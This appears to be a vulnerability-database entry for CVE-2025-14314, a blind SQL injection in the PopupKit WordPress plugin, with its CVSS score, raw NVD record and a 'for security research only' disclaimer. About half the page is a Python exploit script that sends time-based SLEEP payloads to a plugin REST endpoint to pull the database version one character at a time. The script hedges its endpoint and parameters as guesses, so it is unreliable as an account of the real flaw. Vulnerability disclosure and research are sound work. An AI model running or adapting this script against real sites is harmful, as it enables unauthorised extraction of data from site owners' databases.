Security Vulnerability Report
中文
CVE-2025-14314 CVSS 8.5 HIGH

CVE-2025-14314

Published: 2025-12-18 08:15:50
Last Modified: 2026-04-27 17:16:24
Source: [email protected]

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Roxnor PopupKit popup-builder-block allows Blind SQL Injection.This issue affects PopupKit: from n/a through <= 2.1.5.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

PopupKit <= 2.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2025-14314 PopupKit Blind SQL Injection PoC # Target: WordPress site with PopupKit plugin <= 2.1.5 target_url = "http://target-site.com/wp-json/popupkit/v1/popups" def blind_sql_inject(payload): """ Blind SQL Injection to extract database version Modify the payload based on target parameter """ headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0' } # Example payload structure (adjust based on actual vulnerable endpoint) data = { 'popup_id': payload, 'action': 'get_popup' } start_time = time.time() try: response = requests.post(target_url, json=data, headers=headers, timeout=10) elapsed = time.time() - start_time return elapsed, response except: return 0, None def extract_char(position, ascii_val): """ Extract character using time-based blind SQL injection """ # SQL payload: if ascii(substring((select version()),pos,1)) > ascii_val, sleep(5), else 0 payload = f"1' AND IF(ASCII(SUBSTRING((SELECT VERSION()),{position},1))>{ascii_val},SLEEP(5),0)-- -" elapsed, _ = blind_sql_inject(payload) return elapsed > 4 def enumerate_version(): """ Enumerate MySQL version using binary search """ result = "" for pos in range(1, 20): low, high = 32, 127 while low < high: mid = (low + high) // 2 if extract_char(pos, mid): low = mid + 1 else: high = mid if low == 32: break result += chr(low) print(f"[*] Extracted: {result}") return result if __name__ == "__main__": print("[*] CVE-2025-14314 PopupKit Blind SQL Injection PoC") print("[*] Target:", target_url) version = enumerate_version() print(f"[+] Database Version: {version}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14314", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:49.510", "lastModified": "2026-04-27T17:16:24.363", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Roxnor PopupKit popup-builder-block allows Blind SQL Injection.This issue affects PopupKit: from n/a through <= 2.1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/popup-builder-block/vulnerability/wordpress-popupkit-plugin-2-1-5-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.